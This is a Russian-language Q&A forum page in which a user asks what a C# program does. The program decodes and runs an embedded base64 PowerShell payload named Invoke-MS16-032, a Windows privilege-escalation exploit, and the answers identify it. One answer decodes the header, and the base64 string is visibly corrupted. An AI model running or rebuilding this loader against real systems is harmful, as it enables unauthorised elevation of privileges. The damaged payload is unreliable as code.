В чем суть скрипта? Что он делает?

Question

antonisan @antonisan

C#

В чем суть скрипта? Что он делает?

using System;
using System.IO;
using System.Collections.Generic;
using System.Collections.ObjectModel;
using System.Text;
using System.Threading.Tasks;
using System.Management.Automation;
using System.Management.Automation.Host;
using System.Management.Automation.Runspaces;

namespace MS16_032
{
    class Program
    {
        static void Main()
        {
            PowerShellExecutor t = new PowerShellExecutor();
            t.ExecuteSynchronously();
        }
    }

    class PowerShellExecutor
    {
        public static string PSInvoke_MS16_032 = System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(@"ZnVuY3Rpb24gSW52b2tlLU1TMTYtMDMyIHsNCjwjDQouU1lOT1BTSVMNCiAgICANCiAgICBQb3dlclNoZWxsIGltcGxlbWVudGF0aW9uIG9mIE1TMTYtMDMyLiBUaGUgZXhwbG9pdCB0YXJnZXRzIGFsbCB2dWxuZXJhYmxlDQogICAgb3BlcmF0aW5nIHN5c3RlbXMgdGhhdCBzdXBwb3J0IFBvd2VyU2hlbGwgdjIrLiBDcmVkaXQgZm9yIHRoZSBkaXNjb3Zlcnkgb2YNCiAgICB0aGUgYnVnIGFuZCB0aGUgbG9naWMgdG8gZXhwbG9pdCBpdCBnbyB0byBKYW1lcyBGb3JzaGF3IChAdGlyYW5pZGRvKS4NCiAgICANCiAgICBUYXJnZXRzOg0KICAgIA0KICAgICogV2luNy1XaW4xMCAmIDJrOC0yazEyIDw9PSAzMi82NCBiaXQhDQogICAgKiBUZXN0ZWQgb24geDMyIFdpbjcsIHg2NCBXaW44LCB4NjQgMmsxMlIyDQogICAgDQogICAgTm90ZXM6DQogICAgDQogICAgKiBJbiBvcmRlciBmb3IgdGhlIHJhY2UgY29uZGl0aW9uIHRvIHN1Y2NlZWQgdGhlIG1hY2hpbmUgbXVzdCBoYXZlIDIrIENQVQ0KICAgICAgY29yZXMuIElmIHRlc3RpbmcgaW4gYSBWTSBqdXN0IG1ha2Ugc3VyZSB0byBhZGQgYSBjb3JlIGlmIG5lZWRlZCBta2F5Lg0KICAgICogVGhlIGV4cGxvaXQgaXMgcHJldHR5IHJlbGlhYmxlLCBob3dldmVyIH4xLzYgdGltZXMgaXQgd2lsbCBzYXkgaXQgc3VjY2VlZGVkDQogICAgICBidXQgbm90IHNwYXduIGEgc2hlbGwuIE5vdCBzdXJlIHdoYXQgdGhlIGlzc3VlIGlzIGJ1dCBqdXN0IHJlLXJ1biBhbmQgcHJvZml0IQ0KICAgICogV2FudCB0byBrbm93IG1vcmUgYWJvdXQgTVMxNi0wMzIgPT0+DQogICAgICBodHRwczovL2dvb2dsZXByb2plY3R6ZXJvLmJsb2dzcG90LmNvLnVrLzIwMTYvMDMvZXhwbG9pdGluZkUHJvY2Vzc0luZm8uaFByb2Nlc3MpDQoJCSRDYWxsUmVzdWx0ID0gW0tlcm5lbDMyXTo6Q2xvc2VIYW5kbGUoJFByb2Nlc3NJbmZvLmhUaHJlYWQpDQoJCX0NCgkJDQoJCSMgS2lsbCBydW5zcGFjZSAmIHN0b3B3YXRjaCBpZiBlZGdlLWNhc2UNCgkJJFN0YXJ0VG9rZW5SYWNlLlN0b3AoKQ0KCQkkU2FmZUd1YXJkLlN0b3AoKQ0KCX0NCn0="));

        public void ExecuteSynchronously()
        {
            InitialSessionState iss = InitialSessionState.CreateDefault();
            Runspace rs = RunspaceFactory.CreateRunspace(iss);
            rs.Open();
            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;
            ps.AddScript(PSInvoke_MS16_032);
            ps.AddScript("Invoke-MS16-032");
            ps.AddCommand("Out-Default");
            ps.Invoke();
            rs.Close();
        }
    }
}

Вопрос задан более трёх лет назад
135 просмотров

1 комментарий

Подписаться 1 Средний 1 комментарий

Решения вопроса 1

Комментировать

Пригласить эксперта

Ответы на вопрос 1

Комментировать

Ваш ответ на вопрос

Войдите, чтобы написать ответ

Войти через центр авторизации

Похожие вопросы

C#

+2 ещё

Простой
Почему получается подключить Core в Dockerfile?
- 2 подписчика
- 11 часов назад
- 125 просмотров
2

ответа
C#

Простой
Как из файла txt записать в Dictionary?
- 1 подписчик
- 16 часов назад
- 81 просмотр
1

ответ
Python

+2 ещё

Простой
Как транслировать аудио в микрофон, py, c#, c++?
- 1 подписчик
- 16 часов назад
- 118 просмотров
3

ответа
C#

+1 ещё

Простой
OpenCL в C# — какими средствами и где взять HelloWorld?
- 1 подписчик
- вчера
- 49 просмотров
0

ответов
Python

+1 ещё

Средний
Сервер C# не принимает сообщения от клиента. Почему так?
- 1 подписчик
- 21 апр.
- 113 просмотров
0

ответов
C#

+1 ещё

Простой
Как в Delphi импортировать внешнюю библиотеку классов на языке C#?
- 1 подписчик
- 19 апр.
- 123 просмотра
0

ответов
C#

+1 ещё

Простой
Как решить проблему database is locked?
- 1 подписчик
- 17 апр.
- 91 просмотр
1

ответ
C#

Простой
C# и несколько CPU?
- 6 подписчиков
- 15 апр.
- 4231 просмотр
3

ответа
C#

+1 ещё

Простой
Как сделать смену обьекта при приближении?
- 1 подписчик
- 14 апр.
- 74 просмотра
1

ответ
Windows

+2 ещё

Простой
Как обеспечить относительный путь к БД SQLite?
- 1 подписчик
- 14 апр.
- 121 просмотр
3

ответа
Показать ещё Загружается…

Middle+ .Net(C#) developer

Zam.io

от 200 000 до 300 000 ₽

Разработчик C# (криптография)

Avanpost

от 200 000 ₽

C# разработчик

САТЕЛ

от 120 000 до 200 000 ₽

SMM для HR

23 апр. 2024, в 08:58

15000 руб./за проект

[python] протестировать function calling у gpt-4 и у claude 3 opus

23 апр. 2024, в 08:50

200 руб./за проект

Разработка кроссплатформенного приложения

23 апр. 2024, в 08:42

60 руб./за проект

3. В процессе создания вопроса пользователь Сервиса обязан:
3.8. Использовать для демонстрации фрагментов кода только специальный тег <code> или специальные демонстрационные ресурсы (например, JsFiddle - https://jsfiddle.net/). Размещение фрагментов кода в виде изображений запрещено.

Answer 1 · 2021-01-20 17:54:30

Очевидно, суть программы (это не скрипт, забудьте это слово в конце концов уже применительно к чему-то не на Python, JS и Unity), запустить как раз-таки скрипт на PowerShell, который реализует вот этот вот эксплоит: https://googleprojectzero.blogspot.com/2016/03/exp...

Answer 2 · 2021-01-20 16:35:21

Что-то в Powershell запускает (видимо эксплойт какой-то)
В base64 строке закодировано:

function Invoke-MS16-032 {
<#
.SYNOPSIS
    
    PowerShell implementation of MS16-032. The exploit targets all vulnerable
    operating systems that support PowerShell v2+. Credit for the discovery of
    the bug and the logic to exploit it go to James Forshaw (@tiraniddo).
    
    Targets:
    
    * Win7-Win10 & 2k8-2k12 <== 32/64 bit!
    * Tested on x32 Win7, x64 Win8, x64 2k12R2
    
    Notes:
    
    * In order for the race condition to succeed the machine must have 2+ CPU
      cores. If testing in a VM just make sure to add a core if needed mkay.
    * The exploit is pretty reliable, however ~1/6 times it will say it succeeded
      but not spawn a shell. Not sure what the issue is but just re-run and profit!
    * Want to know more about MS16-032 ==>
      https://googleprojectzero.blogspot.co.uk/2016/03/exploitinfE&6W74f&6W72РD6&W7VBW&V3%ӣ66TFRE&6W74fF&VBРРР2'V76Rb7FvF6bVFvR66PРE7F'EFV&6R7FРE6fTwV&B7FРЧ

base64 строка при этом походу сломанная. Гуглёж "MS16-032" выдаёт вот этот скрипт: https://gist.github.com/ssherei/41eab0f2c038ce8b35...

В чем суть скрипта? Что он делает?

Войдите, чтобы написать ответ

Минуточку внимания

Войдите на сайт